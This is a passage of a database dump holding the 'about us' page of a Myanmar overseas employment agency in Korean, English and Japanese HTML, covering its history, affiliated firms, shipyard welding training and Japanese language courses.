style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 190, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\" data-align=\"center\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 190, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span 